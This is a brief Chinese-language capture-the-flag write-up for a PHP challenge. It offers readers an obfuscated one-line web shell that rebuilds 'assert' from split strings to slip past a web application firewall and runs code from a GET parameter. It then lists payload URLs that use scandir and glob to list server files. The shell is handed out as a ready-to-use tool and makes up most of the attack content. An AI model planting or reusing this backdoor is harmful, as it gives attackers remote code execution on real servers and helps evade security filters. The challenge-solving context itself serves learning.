wp

题目地址:http://120.24.86.145:8010/

送给大家一个过狗一句话:
<?php $poc="a#s#s#e#r#t";$poc_1=explode("#",$poc);$poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5];$poc_2($_GET['s'])?>

搜索到的几种解法:
1. s=print_r(scandir(‘./‘))
http://120.24.86.145:8010/?s=print_r(scandir('./'))

2. s=print_r(glob("*.*"))
http://120.24.86.145:8010/?s=print_r(glob("*.*"))

scandir()函数:

scandir() 函数返回指定目录中的文件和目录的数组。

glob()函数:
glob() 函数返回匹配指定模式的文件名或目录。
该函数返回一个包含有匹配文件 / 目录的数组。如果出错返回 false。